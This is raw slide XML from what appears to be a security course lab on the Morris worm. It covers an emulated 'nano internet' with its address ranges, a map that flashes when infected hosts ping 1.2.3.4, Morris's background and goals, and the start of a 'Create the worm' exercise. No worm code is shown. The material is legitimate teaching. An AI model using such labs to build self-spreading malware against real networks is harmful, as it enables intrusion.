          <a:xfrm>
            <a:off x="6857621" y="1396238"/>
            <a:ext cx="1940760" cy="1605960"/>
            <a:chOff x="6857621" y="1396238"/>
            <a:chExt cx="1940760" cy="1605960"/>
          </a:xfrm>
        </p:grpSpPr>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53247ADB-18FC-34E5-7C4B-C39FFC202DDD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6857621" y="1396238"/>
                <a:ext cx="1783080" cy="1605960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="28" name="Ink 27">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53247ADB-18FC-34E5-7C4B-C39FFC202DDD}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId20"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6848981" y="1387238"/>
                  <a:ext cx="1800720" cy="1623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38A7C7CB-FEDC-0EEC-79E8-E7107F4F6512}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8606141" y="1403438"/>
                <a:ext cx="192240" cy="136800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="29" name="Ink 28">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38A7C7CB-FEDC-0EEC-79E8-E7107F4F6512}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId22"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8597501" y="1394798"/>
                  <a:ext cx="209880" cy="154440"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95E9BD74-8865-C83E-A054-C000533AFE97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8535694" y="2436070"/>
            <a:ext cx="2210798" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>alias are defined here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="88992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DEFFB-00CA-9BF2-FEF0-E7E6B0CAC1E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3545734" y="1619838"/>
            <a:ext cx="6155343" cy="4254305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16B4F18B-6EC4-804B-2869-21BC2B033EB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3545734" y="1250506"/>
            <a:ext cx="6629764" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In a new shell windows (new tab), verify the nano internet is running</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97A82F02-3232-F033-2324-D622C5E16E68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8101263" y="2887579"/>
            <a:ext cx="1812758" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>three subnets are marked in different colors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AB05413-1A92-8D1C-0E64-A4B7B8550525}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="386119" y="385561"/>
            <a:ext cx="2179509" cy="1729890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49F493ED-C724-4994-D54E-12DCACF69F2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2470484" y="1491916"/>
            <a:ext cx="1002632" cy="23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32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069D8-F9E5-7830-EBC0-B36B8F26D2E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2484508"/>
            <a:ext cx="8634208" cy="1310754"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8C351C5-34C4-D501-094B-3BFA345D5B7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Visualize nano internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02CDFF92-FADD-FF50-895F-B1A2706B0B64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="899308" y="3433280"/>
            <a:ext cx="5837426" cy="723963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9236175D-A515-E2BC-4E1B-742F7D29E066}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="899308" y="4053255"/>
            <a:ext cx="5936494" cy="899238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3346423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C4FE2-DE02-F67C-FFE3-1C090EB0CC6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1657350" y="0"/>
            <a:ext cx="8877300" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46A6584A-5B9F-804D-0D15-BD7693FD0B28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5155531" y="188312"/>
            <a:ext cx="6172200" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://localhost:8080/map.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B307487-6E9D-6D32-CBE1-CC64215452F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1657350" y="1628787"/>
            <a:ext cx="2049585" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>IP range 10.X.0.Y</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>X = [151-153] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Y = [71 - 75]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354629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589F3A-EDB1-F761-5734-10DB2227B438}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1705745" y="0"/>
            <a:ext cx="8780510" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA4840F8-1792-D6EB-9E94-A83EA6EA7AD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="39059"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5752692"/>
            <a:ext cx="5753599" cy="1105308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B310F6B-88B1-8C7F-BE00-58A9A6D7A427}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1075853"/>
            <a:ext cx="2261508" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to manually sent a package in a host and observe the results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="323242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09C173-AF44-231D-95D9-D9305797C730}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10068448" y="4642338"/>
            <a:ext cx="678904" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>why?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1EC881F-B4F2-EBA4-F493-62AC0192A9E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1314718" y="0"/>
            <a:ext cx="9562564" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A9A39B1-413D-217A-FB03-1848B597C663}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9439589" y="4710219"/>
            <a:ext cx="2752411" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The map flashes any host pings 1.2.3.4. once a host is infected, we let the host runs "ping 1.2.3.4“. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E25B67EF-0A4C-1390-75FA-51A2AF320C38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="689811" y="360947"/>
            <a:ext cx="624907" cy="457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625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CE15-2F58-F4F2-CD30-07433BC6099D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is Morris Worm?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C634A31-3E21-C833-950B-24879D8160E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A malware was developed by Robert Tappan MORRIS,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>was a first-year graduate student in Cornell University's computer science Ph.D. program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>did undergraduate work at Harvard </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>a tenured professor at MIT in 2006</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>had a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> account the Cornell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Morris’ goal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>a program can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>self-spread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> across a national network of computers after being inserted at one computer location connected to the network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>not destructive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>demonstrate the inadequacies of current security measures on computer networks by exploiting the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>security defects </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>that he had discovered</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF505347-D1ED-18D7-1E68-F334A9E7153E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6238374" y="6492875"/>
            <a:ext cx="3266574" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>http://www.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>loundy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>.com/CASES/US_v_Morris2.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2206684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DFE2D-F513-9FDA-E808-7FDF61BD678E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hands-on Lab (3): Create the worm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F3EF985-1A6A-8597-E70B-89602470E6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4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3D8F-3CCF-7DA5-3721-23FAF870DDF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Characters of the lab’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>worm.py</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE3F1F6C-5437-3958-E9C2-B87B156E1826}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
